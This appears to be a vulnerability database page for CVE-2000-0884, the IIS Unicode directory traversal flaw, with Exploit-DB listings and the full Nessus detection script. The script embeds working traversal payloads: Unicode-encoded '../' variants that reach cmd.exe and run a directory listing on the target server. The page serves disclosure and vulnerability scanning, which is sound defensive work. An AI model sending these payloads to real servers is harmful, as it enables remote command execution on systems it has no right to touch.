Vulnerabilities > CVE-2000-0884 - Unspecified vulnerability in Microsoft products

CVSS 0.0 - NONE

Attack vector

UNKNOWN

Attack complexity

UNKNOWN

Privileges required

UNKNOWN

Confidentiality impact

UNKNOWN

Integrity impact

UNKNOWN

Availability impact

UNKNOWN

microsoft

nessus

exploit available

NVD

Published: 2000-12-19

Updated: 2018-10-30

Summary

IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability.

Vulnerable Configurations

Part	Description	Count
Application	Microsoft Microsoft Internet Information Services 5.0 Microsoft Internet Information Server 4.0	2

Exploit-Db

description	MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (6). CVE-2000-0884. Remote exploit for windows platform
id	EDB-ID:189
last seen	2016-01-31
modified	2000-11-18
published	2000-11-18
reporter	incubus
source	https://www.exploit-db.com/download/189/
title	Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability 6

description	MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (2). CVE-2000-0884. Remote exploit for windows platform
id	EDB-ID:20299
last seen	2016-02-02
modified	2000-10-21
published	2000-10-21
reporter	Roelof Temmingh
source	https://www.exploit-db.com/download/20299/
title	Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability 2

description	MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (7). CVE-2000-0884. Remote exploit for windows platform
id	EDB-ID:191
last seen	2016-01-31
modified	2000-11-18
published	2000-11-18
reporter	steeLe
source	https://www.exploit-db.com/download/191/
title	Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability 7

description	MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (3). CVE-2000-0884. Remote exploit for windows platform
id	EDB-ID:20300
last seen	2016-02-02
modified	2000-10-17
published	2000-10-17
reporter	zipo
source	https://www.exploit-db.com/download/20300/
title	Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability 3

description	MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (1). CVE-2000-0884. Remote exploit for windows platform
id	EDB-ID:20298
last seen	2016-02-02
modified	2000-10-17
published	2000-10-17
reporter	Gabriel Maggiotti
source	https://www.exploit-db.com/download/20298/
title	Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability 1

description	MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (9). CVE-2000-0884. Remote exploit for windows platform
id	EDB-ID:190
last seen	2016-01-31
modified	2000-11-18
published	2000-11-18
reporter	Optyx
source	https://www.exploit-db.com/download/190/
title	Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability 9

description	MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (5). CVE-2000-0884. Remote exploit for windows platform
id	EDB-ID:20302
last seen	2016-02-02
modified	2000-10-17
published	2000-10-17
reporter	Andrea Spabam
source	https://www.exploit-db.com/download/20302/
title	Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability 5

description	MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (8). CVE-2000-0884. Remote exploit for windows platform
id	EDB-ID:192
last seen	2016-01-31
modified	2000-11-18
published	2000-11-18
reporter	Roelof Temmingh
source	https://www.exploit-db.com/download/192/
title	Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability 8

description	MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (4). CVE-2000-0884. Remote exploit for windows platform
id	EDB-ID:20301
last seen	2016-02-02
modified	2000-10-17
published	2000-10-17
reporter	BoloTron
source	https://www.exploit-db.com/download/20301/
title	Microsoft IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability 4

Nessus

NASL family	Web Servers
NASL id	IIS_DIR_TRAVERSAL.NASL
description	The hotfix for the
last seen	2020-06-01
modified	2020-06-02
plugin id	10537
published	2000-10-18
reporter	This script is Copyright (C) 2000-2018 H D Moore
source	https://www.tenable.com/plugins/nessus/10537
title	Microsoft IIS Unicode Remote Command Execution
code	# Approved 22Apr01 jao (replaces older version) # # This script was first written Renaud Deraison then # completely re-written by HD Moore # # See the Nessus Scripts License for details # include("compat.inc"); if (description) { script_id(10537); script_version("1.62"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12"); script_cve_id("CVE-2000-0884"); script_bugtraq_id(1806); script_xref(name:"MSFT", value:"MS00-078"); script_xref(name:"MSFT", value:"MS00-086"); script_xref(name:"MSKB", value:"269862"); script_xref(name:"MSKB", value:"276489"); script_xref(name:"MSKB", value:"277873"); script_name(english:"Microsoft IIS Unicode Remote Command Execution"); script_summary(english:"Determines if arbitrary commands can be executed thanks to IIS"); script_set_attribute(attribute:"synopsis", value:"Arbitrary code can be executed on the remote host."); script_set_attribute(attribute:"description", value: "The hotfix for the 'Webserver file request parsing' problem has not been applied. This vulnerability can allow an attacker to make the remote IIS server execute arbitrary commands."); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2000/ms00-078"); script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2000/ms00-086"); script_set_attribute(attribute:"solution", value:"Microsoft has released a set of patches for IIS 4.0 and 5.0."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2000/10/17"); script_set_attribute(attribute:"plugin_publication_date", value:"2000/10/18"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:microsoft:iis"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2000-2020 H D Moore"); script_family(english:"Web Servers"); script_dependencie("find_service1.nasl", "http_version.nasl"); script_require_ports("Services/www", 80); exit(0); } include("http_func.inc"); include("http_keepalive.inc"); port = get_http_port(default:80, embedded:TRUE); banner = get_http_banner(port:port); if ( "IIS" >!< banner ) exit(0); dir[0] = "/scripts/"; dir[1] = "/msadc/"; dir[2] = "/iisadmpwd/"; dir[3] = "/_vti_bin/"; # FP dir[4] = "/_mem_bin/"; # FP dir[5] = "/exchange/"; # OWA dir[6] = "/pbserver/"; # Win2K dir[7] = "/rpc/"; # Win2K dir[8] = "/cgi-bin/"; dir[9] = "/"; uni[0] = "%c0%af"; uni[1] = "%c0%9v"; uni[2] = "%c1%c1"; uni[3] = "%c0%qf"; uni[4] = "%c1%8s"; uni[5] = "%c1%9c"; uni[6] = "%c1%pc"; uni[7] = "%c1%1c"; uni[8] = "%c0%2f"; uni[9] = "%e0%80%af"; function check(req) { local_var pat, pat2, r, soc; # # Don't use http_keepalive_send_recv() because there's no content-length # in the output # soc = open_sock_tcp(port); if (! soc ) exit(0); send(socket:soc, data:http_get(item:req, port:port)); r = recv(socket:soc, length:4096); close(soc); if(r == NULL){ exit(0); } pat = "<DIR>"; pat2 = "Directory of C"; if((pat >< r) \|\| (pat2 >< r)){ security_hole(port:port); return(1); } return(0); } cmd = "/winnt/system32/cmd.exe?/c+dir+c:\\+/OG"; for(d=0;dir[d];d=d+1) { for(u=0;uni[u];u=u+1) { url = string(dir[d], "..", uni[u], "..", uni[u], "..", uni[u], "..", uni[u], "..", uni[u], "..", cmd); if(check(req:url))exit(0); } } foreach d (dir) { if ( check(req:string(d, "..%u00255c..%u00255c", cmd) ) ) exit(0); }

Oval

accepted

2011-05-16T04:02:59.232-04:00

class

vulnerability

contributors

name Tiffany Bergeron
organization The MITRE Corporation
name Dragos Prisaca
organization Gideon Technologies, Inc.
name Sudhir Gandhe
organization Telos
name Shane Shaffer
organization G2, Inc.

description

family

windows

oval:org.mitre.oval:def:44

status

accepted

submitted

2003-10-10T12:00:00.000-04:00

title

IIS Web Server Folder Traversal

version

Saint

bid	1806
description	IIS Unicode Directory Traversal
id	web_server_iis_unicode
osvdb	436
title	iis_unicode_traversal
type	remote

Summary

Vulnerable Configurations

Exploit-Db

Nessus

Oval

Saint

References